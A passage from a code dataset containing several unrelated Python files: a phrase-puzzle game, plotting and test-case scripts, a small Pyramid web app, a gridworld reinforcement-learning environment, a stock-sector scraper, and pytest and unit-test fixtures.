Valid options are constants.HUMAN,\n    constants.HUMAN_HUMAN, and constants.HUMAN_COMPUTER.\n\n    (Note: Docstring examples not given since result depends on input\n    data.)\n\n    \"\"\"\n\n    prompt = '''Choose the game type:\n    [{}] - One Player\n    [{}] - Human-human\n    [{}] - Human-computer\\n'''\n    valid_options = HUMAN, HUMAN_HUMAN, HUMAN_COMPUTER\n    return prompt_for_selection(prompt, valid_options)\n\n\ndef select_computer_difficulty() -> str:\n    \"\"\"Repeatedly prompt the user for computer difficulty, until a valid\n    input is received. Return the computer difficulty. Valid options\n    are constants.EASY and constants.HARD.\n\n    (Note: Docstring examples not given since result depends on input\n    data.)\n\n    \"\"\"\n\n    prompt = 'Choose the game difficulty ([{}] - Easy or [{}] - Hard): '\n    valid_options = EASY, HARD\n    return prompt_for_selection(prompt, valid_options)\n\n\ndef make_view(puzzle: str) -> str:\n    \"\"\"Return a string that is based on puzzle, with each alphabetic\n    character replaced by the constants.HIDDEN character.\n\n    >>> make_view('apple cake is great! #csc108')\n    '^^^^^ ^^^^ ^^ ^^^^^! #^^^108'\n    >>> make_view('108@#$&')\n    '108@#$&'\n\n    \"\"\"\n\n    view = ''\n    for char in puzzle:\n        if char.isalpha():\n            view = view + HIDDEN\n        else:\n            view = view + char\n    return view\n\n\n############################# Game Over: #############################\ndef display_outcome(winner: str, puzzle: str, game_type: str,\n                    player_one_score: int, player_two_score: int) -> None:\n    \"\"\"Display the outcome of game: who won and what the final scores are.\n    \"\"\"\n\n    print('And the winner is... {}!'.format(winner))\n    print('The solution to this game\\'s puzzle is: {}.'.format(puzzle))\n    if pf.is_one_player_game(game_type):\n        print('In this game, the player scored {} point(s)'.\n              format(player_one_score))\n    else:\n        print('In this game, {} scored {} and {} scored {} point(s)'.\n              format(PLAYER_ONE, player_one_score, PLAYER_TWO,\n                     player_two_score))\n\n\n############################# The Program: #############################\nif __name__ == '__main__':\n\n    import doctest\n    doctest.testmod()\n\n    DATA_FILE = 'puzzles_small.txt'\n\n    PUZZLES = []\n    with open(DATA_FILE) as data_file:\n        for line in data_file:\n            PUZZLES.append(line.lower().strip())\n\n    PUZZLE = random.choice(PUZZLES)\n\n    print('Welcome to Phrase Puzzler!')\n\n    print('***' + PUZZLE + '***')\n\n    GAME_TYPE = select_game_type()\n    play_game(PUZZLE, PUZZLES, GAME_TYPE)\n","sub_path":"a1/puzzler.py","file_name":"puzzler.py","file_ext":"py","file_size_in_byte":14630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598797378","text":"import random\nn = 10\nm = n**2 - 9\nk = n**2 + n\n\nprint(n) #Dimension\nprint(\"0.00001\")\nprint(random.randrange(5,n+1)) #random number\n\nfor i in range(n):\n    endline = \" \" if i != n-1 else \"\\n\"\n    print(0,end=endline)\n\nfor i in range(n):\n    for j in range(n):\n        endline = \" \" if j != n-1 else \"\\n\"\n        if i == j:\n            print(random.randrange(m,k),end=endline)\n        else:\n            print(random.randrange(0,n+1),end=endline)\nfor i in range(n):\n    endline = \" \" if i != n-1 else \"\"\n    print(random.randint(0,2*n),end=endline)\n\n\n\n\n","sub_path":"testcase_maker.py","file_name":"testcase_maker.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"118601523","text":"import numpy as np \nimport matplotlib.pyplot as plt\n\nx = np.linspace(0,5,100)\n\nfig = 
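# [Illustrative addition - not part of the original dataset records.]
# testcase_maker.py above draws diagonal entries from [n**2 - 9, n**2 + n) and
# off-diagonal entries from [0, n]; for n = 10 every diagonal entry (>= 91)
# exceeds the largest possible off-diagonal row sum (9 * 10 = 90), so the
# generated matrix is strictly diagonally dominant. A direct check:
import random

n = 10
A = [[random.randrange(n**2 - 9, n**2 + n) if i == j else random.randrange(0, n + 1)
      for j in range(n)] for i in range(n)]

for i in range(n):
    assert A[i][i] > sum(A[i][j] for j in range(n) if j != i)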
plt.figure(figsize=(12,6))\nplt.suptitle('Exponential distribution plots',fontsize=14)\n\n##########################################################\n\n# Exponential distribution probability density function\ndef get_density_y(x, RATE):\n\treturn RATE*np.exp(-RATE*x)\n\n\nax1 = fig.add_subplot(121,ylim=[0,1.5])\n# Get exponential distribution plot\nax1.plot(x,get_density_y(x, 0.5),'r')\nax1.plot(x,get_density_y(x, 1.5),'b')\n# Preferences of first plot\nax1.grid(axis='both',color='y',linestyle='--',linewidth=1)\nax1.legend([r'$\\lambda=0.5$',r'$\\lambda=1.5$'], fontsize=12)\nax1.set_xlabel('x')\nax1.set_ylabel(r'$P(x)$')\nax1.set_title('Probability density function', fontsize=12)\n\n###########################################################\n\ndef get_cumulative_y(x, RATE):\n\treturn 1-np.exp(-x*RATE)\n\n\nax2 = fig.add_subplot(122)\n# Get exponential distribution plot\nax2.plot(x,get_cumulative_y(x, 0.5),'r')\nax2.plot(x,get_cumulative_y(x, 1.5),'b')\n# Preferences of second plot\nax2.grid(axis='both',color='y',linestyle='--',linewidth=1)\nax2.legend([r'$\\lambda=0.5$',r'$\\lambda=1.5$'], fontsize=12)\nax2.set_xlabel('x')\nax2.set_ylabel(r'$P(X \\leq x)$')\nax2.set_title('Cumulative distribution function', fontsize=12)\n\n############################################################\n\nplt.show()","sub_path":"numpy on python 2.7/dist_exp.py","file_name":"dist_exp.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"632004602","text":"from wsgiref.simple_server import make_server\nfrom pyramid.config import Configurator\nfrom pyramid.response import Response\nfrom webob import Request, Response\nfrom jinja2 import Environment, FileSystemLoader\n\nassets = [\n    'app.js',\n    'react.js',\n    'leaflet.js',\n    'D3.js',\n    'moment.js',\n    'math.js',\n    'main.css',\n    'bootstrap.css',\n    'normalize.css',\n]\n\nSTYLES = []\nSCRIPTS = []\n\nfor item in assets:\n    itemsplited = item.split('.')\n    if itemsplited[1] == 'js':\n        SCRIPTS.append(item)\n    elif itemsplited[1] == 'css':\n        STYLES.append(item)\n\nclass make_wsgi_app(object):\n    def __init__(self, app):\n        self.app = app\n\n    def __call__(self, environ, start_response):\n        return self.app(environ, start_response)\n\ndef app(environ, start_response):\n    response_code = '200 OK'\n    response_type = ('Content-Type', 'text/HTML')\n    start_response(response_code, [response_type])\n    return [b'']\n\ndef index(request):\n    env = Environment(loader=FileSystemLoader('.'))\n    template = env.get_template('index.html').render(javascripts=SCRIPTS, styles=STYLES)\n    return Response(template)\n\ndef about(request):\n    env = Environment(loader=FileSystemLoader('.'))\n    template = env.get_template('about/about.html').render(javascripts=SCRIPTS, styles=STYLES)\n    return Response(template)\n\nif __name__ == '__main__':\n    config = Configurator()\n\n    config.add_route('index', '/index.html')\n    config.add_view(index, route_name=\"index\")\n\n    # config.add_route('about', '/about/about.html')\n    # config.add_view(about, route_name=\"about\")\n\n    app = config.make_wsgi_app()\n    make_server('0.0.0.0', 80, app).serve_forever()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"225083018","text":"from .base import *\n\nSECRETS = SECRETS_FULL['dev']\n\nDEBUG = True\nWSGI_APPLICATION = 'config.wsgi.dev.application'\nDATABASES = 
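# [Illustrative addition - not part of the original dataset records.]
# A minimal, self-contained version of the Pyramid wiring used in the
# application.py record above (add_route/add_view/make_wsgi_app); the route,
# port, and response body are arbitrary choices for this sketch:
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response

def index(request):
    return Response('<h1>index</h1>')

if __name__ == '__main__':
    config = Configurator()
    config.add_route('index', '/')
    config.add_view(index, route_name='index')
    app = config.make_wsgi_app()
    make_server('0.0.0.0', 8080, app).serve_forever()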
SECRETS['DATABASES']\nALLOWED_HOSTS += [\n '*',\n]\nINSTALLED_APPS += [\n\n]\n\n# Storage\nAWS_STORAGE_BUCKET_NAME = 'wps-instagram-lhy3'\n","sub_path":"app/config/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"588722411","text":"# Author: Yash Shukla\n# Email: yash.shukla@tufts.edu\n\nimport math\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom matplotlib.cm import get_cmap\nimport time\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\n\n\nclass NovelGridworldV0Env(gym.Env):\n\n def __init__(self, map_width=None, map_height=None, items_id=None, items_quantity=None, goal_env = None, is_final = False):\n # NovelGridworldV0Env attributes\n self.env_name = 'Pick and Place'\n self.map_width = 10\n self.map_height = 10\n self.map = np.zeros((self.map_width, self.map_height), dtype=int) # 2D Map\n self.agent_location = (1, 1) # row, column\n # self.direction_id = {'NORTH': 0, 'SOUTH': 1, 'WEST': 2, 'EAST': 3}\n self.direction_id = {'NORTH': 0}\n self.agent_facing_str = 'NORTH'\n self.agent_facing_id = self.direction_id[self.agent_facing_str]\n self.block_in_front_str = 'air'\n self.block_in_front_id = 0 # air\n self.block_in_front_location = (0, 0) # row, column\n self.items = ['wall', 'cube1', 'cube2', 'cube3']\n self.items_id = self.set_items_id(self.items) # {'crafting_table': 1, 'pogo_stick': 2, ...} # air's ID is 0\n # items_quantity when the episode starts, do not include wall, quantity must be more than 0\n self.items_quantity = {'cube1': 1, 'cube2': 1, 'cube3': 1}\n\n self.available_locations = [] # locations that do not have item placed\n self.not_available_locations = [] # locations that have item placed or are above, below, left, right to an item\n\n # Action Space\n self.action_str = {0: 'Forward', 1: 'Left', 2: 'Right', 3: 'Backward', 4: 'PickUp', 5: 'Drop'}\n self.goal_env = 2\n self.action_space = spaces.Discrete(len(self.action_str))\n self.recipes = {}\n self.last_action = 0 # last actions executed\n self.step_count = 0 # no. of steps taken\n\n # Observation Space\n self.num_beams = 8\n self.max_beam_range = 40\n self.items_lidar = ['wall', 'cube1', 'cube2', 'cube3']\n self.items_id_lidar = self.set_items_id(self.items_lidar)\n self.low = np.array([0] * (len(self.items_lidar) * self.num_beams) + [0]*5 )\n self.high = np.array([self.max_beam_range] * (len(self.items_lidar) * self.num_beams) + [2]*5 ) # maximum 5 trees present in the environment\n self.observation_space = spaces.Box(self.low, self.high, dtype=int)\n\n # Reward\n self.last_reward = 0 # last received reward\n self.last_done = False # last done\n self.reward_done = 1000\n self.reward_break = 30\n self.episode_timesteps = 250\n\n if map_width is not None:\n self.map_width = map_width\n if map_height is not None:\n self.map_height = map_height\n if items_id is not None:\n self.items_id = items_id\n if items_quantity is not None:\n self.items_quantity = items_quantity\n if goal_env is not None:\n self.goal_env = goal_env\n if is_final == True:\n self.reward_break = 10\n\n self.current_pickup_state = 0\n self.current_pickup_item = 0 # 0 = nothing held, 1 = cube1, 2 = cube2\n self.dropped_items = 0\n self.cube1_priority = 0\n self.cube2_priority = 0\n\n if self.goal_env == 2:\n assert not self.items_quantity['cube3'] == 0, \"Cannot drop. 
Insert cube 3\"\n\n def reset(self):\n\n # Variables to reset for each reset:\n self.available_locations = []\n self.not_available_locations = []\n self.last_action = 0 # last actions executed\n self.step_count = 0 # no. of steps taken\n self.last_reward = 0 # last received reward\n self.last_done = False # last done\n\n self.current_pickup_state = 0\n self.current_pickup_item = 0 # 0 = nothing held, 1 = cube1, 2 = cube2\n self.dropped_items = 0\n self.target_dropped_items = self.items_quantity['cube1'] + self.items_quantity['cube2']\n self.release_order = []\n\n self.map = np.zeros((self.map_width - 2, self.map_height - 2), dtype=int) # air=0\n self.map = np.pad(self.map, pad_width=1, mode='constant', constant_values=self.items_id['wall'])\n\n \"\"\"\n available_locations: locations 1 block away from the wall are valid locations to place items and agent\n available_locations: locations that do not have item placed\n \"\"\"\n for r in range(2, self.map_width - 2):\n for c in range(2, self.map_height - 2):\n self.available_locations.append((r, c))\n\n # Agent\n idx = np.random.choice(len(self.available_locations), size=1)[0]\n self.agent_location = self.available_locations[idx]\n\n # Agent facing direction\n self.set_agent_facing(direction_str=np.random.choice(list(self.direction_id.keys()), size=1)[0])\n\n for item, quantity in self.items_quantity.items():\n self.add_item_to_map(item, num_items=quantity)\n\n if self.agent_location not in self.available_locations:\n self.available_locations.append(self.agent_location)\n\n # Update after each reset\n self.items_released = [0,0]\n\n self.target_dropped_items = self.items_quantity['cube1'] + self.items_quantity['cube2']\n if self.items_quantity['cube1'] == 1 and self.items_quantity['cube2'] == 0:\n self.target_release_order = [1]\n self.cube1_priority = 1\n if self.items_quantity['cube1'] == 0 and self.items_quantity['cube2'] == 1:\n self.target_release_order = [2]\n self.cube2_priority = 1\n if self.items_quantity['cube1'] == 1 and self.items_quantity['cube2'] == 1:\n self.target_release_order = [1,2]\n self.cube2_priority = 1\n self.cube1_priority = 2\n\n observation = self.get_observation()\n self.update_block_in_front()\n return observation\n\n def add_item_to_map(self, item, num_items):\n\n item_id = self.items_id[item]\n\n count = 0\n while True:\n if num_items == count:\n break\n assert not len(self.available_locations) < 1, \"Cannot place items, increase map size!\"\n\n idx = np.random.choice(len(self.available_locations), size=1)[0]\n r, c = self.available_locations[idx]\n\n if (r, c) == self.agent_location:\n self.available_locations.pop(idx)\n continue\n\n # If at (r, c) is air, and its North, South, West and East are also air, add item\n if (self.map[r][c]) == 0 and (self.map[r - 1][c] == 0) and (self.map[r + 1][c] == 0) and (\n self.map[r][c - 1] == 0) and (self.map[r][c + 1] == 0):\n self.map[r][c] = item_id\n count += 1\n self.not_available_locations.append(self.available_locations.pop(idx))\n\n def get_lidarSignal(self):\n \"\"\"\n Send several beams (self.num_beams) at equally spaced angles in 360 degrees in front of agent within a range.\n For each beam store the distance (beam_range) for each item in items_id_lidar if the item is found, otherwise 0,\n and return lidar_signals\n \"\"\"\n\n direction_radian = {'NORTH': np.pi, 'SOUTH': 0, 'WEST': 3 * np.pi / 2, 'EAST': np.pi / 2}\n\n # Shoot beams in 360 degrees in front of agent\n angles_list = np.linspace(direction_radian[self.agent_facing_str] - np.pi,\n 
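# the spokes are spaced 2*pi/num_beams apart (45 degrees for the default 8);\n # the [:-1] below drops the 360-degree beam that duplicates 0 degrees.\n 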
direction_radian[self.agent_facing_str] + np.pi,\n self.num_beams + 1)[:-1] # 0 and 360 degree is same, so removing 360\n\n lidar_signals = []\n r, c = self.agent_location\n for angle in angles_list:\n x_ratio, y_ratio = np.round(np.cos(angle), 2), np.round((np.sin(angle)), 2)\n beam_signal = np.zeros(len(self.items_id_lidar), dtype=int)\n\n # Keep sending longer beams until hit an object or wall\n for beam_range in range(1, self.max_beam_range+1):\n r_obj = r + np.round(beam_range * x_ratio)\n c_obj = c + np.round(beam_range * y_ratio)\n obj_id_rc = self.map[int(r_obj)][int(c_obj)]\n\n # If the beam hits an object or wall\n if obj_id_rc != 0:\n item = list(self.items_id.keys())[list(self.items_id.values()).index(obj_id_rc)]\n if item in self.items_id_lidar:\n obj_id_rc = self.items_id_lidar[item]\n beam_signal[obj_id_rc - 1] = beam_range\n break\n\n lidar_signals.extend(beam_signal)\n\n return lidar_signals\n\n def set_agent_facing(self, direction_str):\n\n self.agent_facing_str = direction_str\n self.agent_facing_id = self.direction_id[self.agent_facing_str]\n\n '''\n self.agent_facing_str = list(self.direction_id.keys())[list(self.direction_id.values()).index(self.agent_facing_id)]\n '''\n\n def set_items_id(self, items):\n\n items_id = {}\n for item in sorted(items):\n items_id[item] = len(items_id) + 1\n\n return items_id\n\n def get_observation(self):\n \"\"\"\n observation is lidarSignal + inventory_items_quantity\n :return: observation\n \"\"\"\n\n lidar_signals = self.get_lidarSignal()\n # observation = lidar_signals + [self.inventory_items_quantity[item] for item in\n # sorted(self.inventory_items_quantity)]\n\n # if 1 in self.items_released:\n # self.cube1_priority = 0\n # self.\n\n observation = lidar_signals + [self.current_pickup_item] + self.items_released + [self.cube1_priority, self.cube2_priority]\n\n # print(observation)\n # time.sleep(5.0)\n return np.array(observation)\n\n def step(self, action):\n \"\"\"\n Actions: {0: 'Forward', 1: 'Left', 2: 'Right', 3: 'Backward', 4: 'PickUp', 5: 'Drop'}\n \"\"\"\n\n self.last_action = action\n r, c = self.agent_location\n\n done = False\n reward = -1 # default reward\n # Forward\n if action == 0:\n if self.agent_facing_str == 'NORTH' and self.map[r-1][c] == 0:\n self.agent_location = (r-1, c)\n # Left\n elif action == 1:\n if self.agent_facing_str == 'NORTH' and self.map[r][c-1] == 0:\n self.agent_location = (r, c-1)\n\n # Right\n elif action == 2:\n if self.agent_facing_str == 'NORTH' and self.map[r][c+1] == 0:\n self.agent_location = (r, c+1)\n\n # Backward\n elif action == 3:\n if self.agent_facing_str == 'NORTH' and self.map[r+1][c] == 0:\n self.agent_location = (r+1, c)\n\n\n # PickUp\n elif action == 4:\n self.update_block_in_front()\n # If block in front is not air and wall, place the block in front in inventory\n if self.block_in_front_str == 'cube1' or self.block_in_front_str == 'cube2':\n if self.current_pickup_state == 0:\n block_r, block_c = self.block_in_front_location\n self.map[block_r][block_c] = 0\n reward = self.reward_break\n self.current_pickup_state = 1\n if self.block_in_front_str =='cube1':\n self.current_pickup_item = 1\n elif self.block_in_front_str == 'cube2':\n self.current_pickup_item = 2\n\n # Release\n elif action == 5:\n self.update_block_in_front()\n if self.block_in_front_str == 'cube3':\n if self.current_pickup_state == 1:\n self.release_order.append(self.current_pickup_item)\n self.items_released[self.current_pickup_item-1] = self.current_pickup_item\n if len(self.release_order) > 1:\n if self.release_order == 
self.target_release_order:\n reward = self.reward_break # reward a correct release order so far\n self.current_pickup_state = 0\n self.current_pickup_item = 0\n self.dropped_items += 1\n # flag = 0\n # reward = 0\n # for i in range(len(self.release_order)-1):\n # if self.release_order[i] < self.release_order[i + 1]:\n # flag += 1\n # else:\n # flag += 0\n # self.dropped_items += 1\n # if flag == self.dropped_items-1:\n # reward = self.reward_break\n # else:\n # reward = -20\n # self.current_pickup_state = 0\n # self.current_pickup_item = 0\n\n # Update after each step\n observation = self.get_observation()\n self.update_block_in_front()\n\n if self.goal_env == 0: # If the goal is navigation\n if not self.block_in_front_id == 0 and not self.block_in_front_str == 'wall':\n done = True\n reward = self.reward_done\n\n if self.goal_env == 1: # If the goal is pickup\n if self.current_pickup_item > 0:\n reward = self.reward_done\n done = True\n\n if self.goal_env == 2:\n if self.release_order == self.target_release_order and self.dropped_items == self.target_dropped_items:\n reward = self.reward_done\n done = True\n elif self.dropped_items == self.target_dropped_items:\n reward = -200\n done = True\n\n info = {}\n\n # Update after each step\n self.step_count += 1\n self.last_reward = reward\n self.last_done = done\n\n # if done == False and self.step_count == self.episode_timesteps:\n # done = True\n\n return observation, reward, done, info\n\n def update_block_in_front(self):\n r, c = self.agent_location\n\n\n if self.agent_facing_str == 'NORTH':\n self.block_in_front_id = self.map[r - 1][c]\n self.block_in_front_location = (r - 1, c)\n\n\n if self.block_in_front_id == 0:\n self.block_in_front_str = 'air'\n else:\n self.block_in_front_str = list(self.items_id.keys())[\n list(self.items_id.values()).index(self.block_in_front_id)]\n\n def render(self, mode='human', title=None):\n\n color_map = \"gist_ncar\"\n\n if title is None:\n title = self.env_name\n\n r, c = self.agent_location\n x2, y2 = 0, 0\n if self.agent_facing_str == 'NORTH':\n x2, y2 = 0, -0.01\n elif self.agent_facing_str == 'SOUTH':\n x2, y2 = 0, 0.01\n elif self.agent_facing_str == 'WEST':\n x2, y2 = -0.01, 0\n elif self.agent_facing_str == 'EAST':\n x2, y2 = 0.01, 0\n\n plt.figure(title, figsize=(18, 9))\n plt.imshow(self.map, cmap=color_map, vmin=0, vmax=len(self.items_id))\n # plt.imshow(self.map, cmap=color_map)\n\n plt.arrow(c, r, x2, y2, head_width=0.7, head_length=0.7, color='white')\n plt.title('NORTH', fontsize=20)\n plt.xlabel('SOUTH', fontsize=20)\n plt.ylabel('WEST', fontsize=20)\n # plt.text(self.map_width, self.map_width // 2, 'EAST', rotation=90)\n # plt.text(self.map_size, self.map_size // 2, 'EAST', rotation=90)\n # plt.colorbar()\n # plt.grid()\n\n info = '\\n'.join([\" Info: \",\n \"Env: \"+self.env_name,\n \"Steps: \" + str(self.step_count),\n \"Agent Facing: \" + self.agent_facing_str,\n \"Action: \" + self.action_str[self.last_action],\n \"Reward: \" + str(self.last_reward),\n \"Done: \" + str(self.last_done),\n \"Dropped Items: \" + str(self.dropped_items) + \"/\" + str(self.target_dropped_items)\n ])\n props = dict(boxstyle='round', facecolor='w', alpha=0.2)\n plt.text(-(self.map_width // 2) - 0.5, 2.25, info, fontsize=18, bbox=props) # x, y\n\n # plt.text(-(self.map_size // 2) - 0.5, 2.25, info, fontsize=10, bbox=props) # x, y\n\n if self.last_done:\n you_win = \"You win \"+self.env_name+\"!\"\n props = dict(boxstyle='round', facecolor='w', alpha=1)\n # plt.text(0 - 0.1, (self.map_size // 2), you_win, fontsize=18, bbox=props)\n # plt.text(0 - 0.1, (self.map_width // 2), you_win, fontsize=18, bbox=props)\n\n 
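# The legend below samples colours with item_id / len(items_id), matching\n # the imshow scaling above (vmin=0, vmax=len(items_id)), so map tiles and\n # legend entries stay in sync.\n 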
cmap = get_cmap(color_map)\n\n legend_elements = [Line2D([0], [0], marker=\"^\", color='w', label='agent', markerfacecolor='w', markersize=18,\n markeredgewidth=2, markeredgecolor='k'),\n Line2D([0], [0], color='w', label=\"Legend:\")]\n for item in sorted(self.items_quantity):\n rgba = cmap(self.items_id[item] / len(self.items_id))\n legend_elements.append(Line2D([0], [0], marker=\"s\", color='w',\n label=item + ': ' + str(self.items_quantity[item]),\n markerfacecolor=rgba, markersize=18))\n plt.legend(handles=legend_elements, bbox_to_anchor=(1.55, 1.02), fontsize = 18) # x, y\n\n plt.tight_layout()\n plt.pause(0.01)\n plt.clf()\n\n def close(self):\n return\n","sub_path":"gym_novel_gridworlds/envs/novel_gridworld_v0_env.py","file_name":"novel_gridworld_v0_env.py","file_ext":"py","file_size_in_byte":17616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"255234267","text":"#coding:utf-8\nfrom AMSS.utils.requestor import Requestor\nfrom AMSS.conf.urls import dfcf_headers, url_block, url_bk_kline, url_stocks_block\nimport pandas as pd\nfrom AMSS.utils.timer import get_ts_ms\n\n\nclass Receiver(object):\n def __init__(self, source='dfcf'):\n self.source = source\n\n def get_blocks(self, block_type='gn_block'):\n \"\"\"\n :param block_type:\n :return:\n \"\"\"\n if self.source == 'dfcf':\n url = url_block.format(block_type[0:2].upper())\n r = Requestor(url, headers=dfcf_headers, reg=r'(\\[.*?\\])')\n blocks = r.my_req()\n bk_list = []\n for bk in blocks:\n tmp = bk.split(',')\n bk_tuple = (tmp[1], tmp[2])\n bk_list.append(bk_tuple)\n print(bk_list)\n blocks_df = pd.DataFrame(bk_list, columns=['block_id', 'name'])\n # blocks_df['name'] = blocks_df['name'].to_string\n blocks_df = blocks_df.set_index(['block_id'])\n return blocks_df\n\n\n def get_block_index(self, bk_id, ktype='K'):\n ts = get_ts_ms()\n url = url_bk_kline.format(bk_id, ktype, ts, ts, ts)\n r = Requestor(url, headers=dfcf_headers, reg=r'\\((.*?)\\)')\n index_k = r.my_req()['data']\n # print(index_k)\n data = []\n for day in index_k:\n row_list = day.split(',')\n data.append(row_list)\n index_df = pd.DataFrame(data, columns=('time', 'open', 'close', 'high', 'low', 'vol', 'amount', 'span'))\n index_df['block_id'] = bk_id\n return index_df\n\n def get_stocks(self, bk_id):\n url = url_stocks_block.format(bk_id)\n r = Requestor(url, headers=dfcf_headers, reg=r'(\\[.*?\\])')\n stocks = r.my_req()\n data = []\n for s in stocks:\n code = s.split(',')[1]\n data.append((bk_id, code))\n df_stock = pd.DataFrame(data, columns=('block_id', 'code'))\n return df_stock\n\n\n\nif __name__ == '__main__':\n # print get_blocks()\n pass\n # for i in get_blocks().index:\n # print(get_stocks(i))\n\n","sub_path":"Automaticic_monitoring_system_for_stocks/AMSS/data/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"206703559","text":"import pytest\nfrom aiohttp.test_utils import TestClient\n\nfrom tests import models\nfrom tests.pg_sa.app import get_app\nfrom tests.pg_sa.utils import async_engine_connection\n\n\n@pytest.fixture\nasync def user(loop):\n async with async_engine_connection() as conn:\n query = models.users.select().limit(1)\n return await conn.fetch_one(query)\n\n\n@pytest.fixture\nasync def get_last_created_user(loop):\n async def _get_last_user():\n async with async_engine_connection() as conn:\n query = 
models.users.select().order_by(models.users.c.created_at.desc()).limit(1)\n return await conn.fetch_one(query)\n\n return _get_last_user\n\n\n@pytest.fixture\nasync def get_user_by_id(loop):\n async def _get_user_by_id(user_id):\n async with async_engine_connection() as conn:\n query = models.users.select(models.users.c.id == user_id)\n return await conn.fetch_one(query)\n\n return _get_user_by_id\n\n\n@pytest.fixture\nasync def client(aiohttp_client):\n client: TestClient = await aiohttp_client(get_app())\n return client\n\n\n@pytest.fixture\nasync def pg_sa_instance(loop):\n async with async_engine_connection() as conn:\n query = models.pg_sa_fields.select().limit(1)\n return await conn.fetch_one(query)\n\n\ndef pytest_runtest_setup(item):\n if \"with_client\" in item.keywords and \"client\" not in item.fixturenames:\n # inject client\n item.fixturenames.append(\"client\")\n","sub_path":"tests/pg_sa/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"114517193","text":"import cea\nimport cea.GUI\nimport cea.GUI.toolbox\n\n__author__ = \"Daren Thomas\"\n__copyright__ = \"Copyright 2016, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Daren Thomas\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"thomas@arch.ethz.ch\"\n__status__ = \"Production\"\n\nreload(cea)\nreload(cea.GUI)\nreload(cea.GUI.toolbox)\n\nDemandTool = cea.GUI.toolbox.DemandTool\nPropertiesTool = cea.GUI.toolbox.PropertiesTool\nEmissionsTool = cea.GUI.toolbox.EmissionsTool\nEmbodiedEnergyTool = cea.GUI.toolbox.EmbodiedEnergyTool\nHeatmapsTool = cea.GUI.toolbox.HeatmapsTool\nGraphsDemandTool = cea.GUI.toolbox.GraphsDemandTool\nRadiationTool = cea.GUI.toolbox.RadiationTool\nScenarioPlotsTool = cea.GUI.toolbox.ScenarioPlotsTool\nGraphsBenchmarkTool = cea.GUI.toolbox.GraphsBenchmarkTool\nMobilityTool = cea.GUI.toolbox.MobilityTool\n\nclass Toolbox(object):\n def __init__(self):\n self.label = 'City Energy Analyst'\n self.alias = 'cea'\n self.tools = [PropertiesTool, DemandTool, EmissionsTool, EmbodiedEnergyTool, HeatmapsTool, GraphsDemandTool,\n RadiationTool, ScenarioPlotsTool, GraphsBenchmarkTool, MobilityTool]\n","sub_path":"City Energy Analyst.pyt","file_name":"City Energy Analyst.pyt","file_ext":"pyt","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"514180334","text":"import h5py\nimport unittest\nimport numpy as np\n\nfrom QGL import *\nfrom instruments.drivers import APSPattern\n\nclass APSPatternUtils(unittest.TestCase):\n def setUp(self):\n # self.q1gate = Channels.LogicalMarkerChannel(label='q1-gate')\n # self.q1 = Qubit(label='q1', gateChan=self.q1gate)\n self.q1 = Qubit(label='q1')\n self.q1.pulseParams['length'] = 30e-9\n\n Compiler.channelLib = {'q1': self.q1}\n\n def test_unroll_loops_simple(self):\n q1 = self.q1\n seqs = [repeat(2, [qwait(), X(q1), Id(q1)]), repeat(2, [qwait(), Y(q1), Id(q1)])]\n a, b = APSPattern.unroll_loops(seqs)\n assert(a == seqs)\n assert(b == 2)\n\n def test_unroll_loops(self):\n q1 = self.q1\n seqs = [repeat(2, [qwait(), X(q1), Id(q1)]), repeat(3, [qwait(), Y(q1), Id(q1)])]\n a, b = APSPattern.unroll_loops(seqs)\n\n seqUnrolled = [qwait(), X(q1), Id(q1)]*2\n assert(a[0] == seqUnrolled)\n\n seqUnrolled = [qwait(), Y(q1), Id(q1)]*3\n assert(a[1] == seqUnrolled)\n\n assert(b == 0)\n\n def 
test_unroll_nested_loops(self):\n q1 = self.q1\n seqs = [repeat(2, [X(q1),Y(q1)] + repeat(3, [Z(q1)]) + [Y(q1),X(q1)]), [X(q1), Y(q1)]]\n a, b = APSPattern.unroll_loops(seqs)\n\n loopedZ = Z(q1)\n loopedZ.repeat = 3\n seqUnrolled = ([X(q1),Y(q1), loopedZ, Y(q1),X(q1)])*2\n\n assert(a[0] == seqUnrolled)\n\n assert(b == 0)\n\n def test_unroll_single_entry(self):\n q1 = self.q1\n seqs = [repeat(5, [X(q1)]) + [Y(q1)]]\n a, b = APSPattern.unroll_loops(seqs)\n seqUnrolled = [X(q1), Y(q1)]\n seqUnrolled[0].repeat = 5\n\n assert(a[0] == seqUnrolled)\n assert(b == 0)\n\nif __name__ == \"__main__\": \n unittest.main()\n","sub_path":"tests/test_APSPattern.py","file_name":"test_APSPattern.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"180949878","text":"__author__ = 'huergasi'\n\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nimport theano as t\n\ndef parsefile(filename, targetoffset):\n indices = [1,2,3,4,6,7,8,9,11,12,13,14]\n volume_index = [16]\n original_data = getoriginaldata(filename)\n file = open(filename, 'r')\n start = 0\n previous = []\n x=[]\n y=[]\n i = 0\n 